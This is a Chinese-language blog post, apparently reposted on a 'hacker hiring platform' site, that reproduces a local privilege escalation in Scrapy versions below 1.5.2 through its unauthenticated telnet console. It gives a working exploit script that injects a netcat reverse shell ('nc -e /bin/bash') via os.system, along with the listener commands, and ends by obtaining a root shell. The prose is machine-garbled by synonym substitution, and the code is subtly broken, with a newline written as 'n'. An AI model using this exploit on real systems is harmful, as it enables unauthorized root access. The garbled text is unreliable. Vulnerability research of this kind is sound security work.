*** 爬虫暗藏杀机:在Scrapy中利用Telnet服务LPE-黑客接单平台

访客5年前黑客文章532
*** 抓取结构中运用最多的莫过所以scrapy,但是咱们是否考虑过这个结构是否存在缝隙妮?5年前曾经在scrapy中爆出过XXE缝隙,但是这次咱们发现的缝隙是一个LPE。 经过该缝隙能够获得shell,本文中露出的缝隙会产生影响scrapy低于1.5.2的版别。 0×01 环境建立 Kali体系 Scrapy(v1.5.1)[https://github.com/scrapy/scrapy/releases] 下载压缩包scrapy-1.5.1.zip,然后进行解压履行装置: Python3 setup.py install 假如装置报错,记住装置python3的pip,然后输入pip3 install Twisted 装置完Twisted模块,再次Python3 setup.py install 就能够完结装置。 0×02 缝隙剖析进程 Scrapy很简单上手,就如同在官网主页上看到的相同简单,能够快速的写一个蜘蛛爬虫。然后再运转的时分咱们能够看到会发动的扩展和一些选项信息,咱们能够清楚的看到默许它会发动telnet服务。 然后这个telnet会监听本地的6023端口。 敞开telnet的原因是便利调试,那么假如有人拜访了这个telnet是不是能够获得一些风趣的东西,并且该控制台会不会在没有任何身份验证的情况下可用然后任何本地用户都能够连接到端口并在运转蜘蛛的用户情况下履行命令,那么是不是会形成本地权限提高(LPE)。 复现LPE 这种运用需求满意两个条件: 1. 开发能够拜访体系 2. 有一个蜘蛛在运转并露出了telnet服务。以下蜘蛛契合此要求,进行初始恳求,然后因download_delay设置而空转 telnet_test.py import scrapy from scrapy.http import Request class TelnetWaitingSpider(scrapy.Spider): name = "telnet_waiting" allowed_domains = ["example.org"] start_urls = ["http://www.example.org"] download_delay = 1000 def parse(self, _): yield Request(url="http://www.example.org/") 咱们然后再写一个运用的exp: exp.py: import telnetlib rs = "nc.traditional -e /bin/bash localhost 4444" tn = telnetlib.Telnet("localhost", 6023) tn.write(f"import os; os.system('{rs}')".encode("ascii") + b"n") Exp.py它界说了一个反向shell,连接到telnet服务并发送一行来运用Python履行反向shell os.system。 操作流程 先运用root账户调用Scrapy去运转telnet_test.py,然后经过su调用两个低权限账号,一个担任接纳nc反弹shell,一个担任履行exp.py,然后运转telnet_test的时分履行exp.py。 先运用nc -lvp 4444 监听4444端口; 运转指令:scrapy runspider telnet_test.py; 然后运转的时分 python3 exp.py; 然后获取反弹shell(发现是root)。 成功复现了一个LPE(本地权限提高)。 0×03总结 信息安全的实质是信赖问题,当咱们运用了结构就代表咱们信赖了这个结构,假如结构的安全性不对其进行检测,那么所带来的是毁灭性的成果。

相关文章

带外通道技术(OOB)总结-黑客接单平台

在浸透中,常常碰到封闭回显的缝隙,常见的XXE盲注,SQL盲注,反序列号无回显,这个时分常用到OOB带外数据通道,带外通道技能(OOB)让进犯者可以经过另一种方法来承认和运用所谓的盲目(blind)的...

【对立蠕虫】怎么维护网页里的按钮,不被 XSS 主动点击

前语 XSS 主动点按钮有什么损害? 在交际网络里,大多操作都是经过点击按钮建议的。例如宣布留言,假设留言体系有 BUG,那么 XSS 就能主动点击发送按钮,发布带有恶意代码的留言。老友看了中招后,又...

揭秘美国运通网络垂钓活动

咱们看到许多针对电子邮件、银行、PayPal、信用卡以及其他财政凭证的网上欺诈活动。本事例与其他许多事例略有不同,愈加杂乱,旨在加大反网络垂钓东西进行剖析和阻挠的难度。它伪装成美国运通发送给客户有关帐...

浏览器进犯结构BeEF Part 5:进犯Web使用与进犯网络

前语 上一章介绍了Tunneling Proxy技能以及怎样运用这项技能来绕过httponly完成高档的会话盗取。本章评论如安在不违背SOP情况下,经过勾连浏览器进犯Web运用与进犯网络。其中有一些进...

Java Web 工程源代码安全审计实战,第 1 部分: 跨站 XSS

 Java Web 运用安全问题日益严峻。源代码审计能够防备于未然。源代码审计人员要经过实战审计练习,才干熟练掌握 Java Web 源代码安全思路和技巧。 前语 Web 运用是互联网运用的重要方式...

内存取证:查找Metasploit的Meterpreter踪影

Metasploit是一个十分受欢迎的浸透测验结构,被视为安全测验人员手中的一把利器。但在另一方面由于他过于强壮,因而也常常被一些歹意攻击者所运用。当然,在本文咱们首要评论的是关于内存取证,这对于咱们...